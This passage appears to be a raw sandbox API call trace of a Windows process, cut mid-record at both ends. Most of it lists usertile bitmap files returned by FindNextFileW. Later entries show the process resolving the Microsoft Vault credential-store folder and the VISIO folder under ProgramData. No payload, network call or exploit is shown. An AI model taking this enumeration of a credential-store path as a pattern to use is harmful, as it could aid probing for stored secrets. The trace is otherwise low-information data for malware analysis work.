lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xda0a8861, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0138.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb5a2927, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0138.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb6d3417, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0138.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb76b98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0138.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb82a065, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0138.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdbb95fd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0138.767] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdca9c9ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0138.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc3f8f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0138.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc65a55, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0138.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc8bbb3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0138.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdccb1d11, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0138.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd069f3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0138.768] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd09009d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0138.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd0b61fb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0138.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd232fa7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0138.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd259105, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0138.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd27f263, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0138.769] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd2a53c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0138.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3177db, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0138.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd33d939, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0138.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0138.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0138.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd42216d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0138.770] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd4482cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0138.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9c9561, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0138.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0138.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0138.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0138.771] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0138.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc2ab41, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0138.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc50c9f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0138.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddcc30b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0138.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddce9217, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0138.772] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd0f375, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0138.773] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0138.773] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 0 [0138.774] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.774] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.774] CoTaskMemFree (pv=0x4e1c10) [0138.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.774] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Vault", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Vault", lpFilePart=0x0) returned 0x1e [0138.775] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.775] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.775] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.776] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.776] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.776] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.776] CoTaskMemFree (pv=0x4e1c10) [0138.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.776] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\VISIO", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\VISIO", lpFilePart=0x0) returned 0x1e [0138.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.778] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.779] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0138.779] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.779] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: 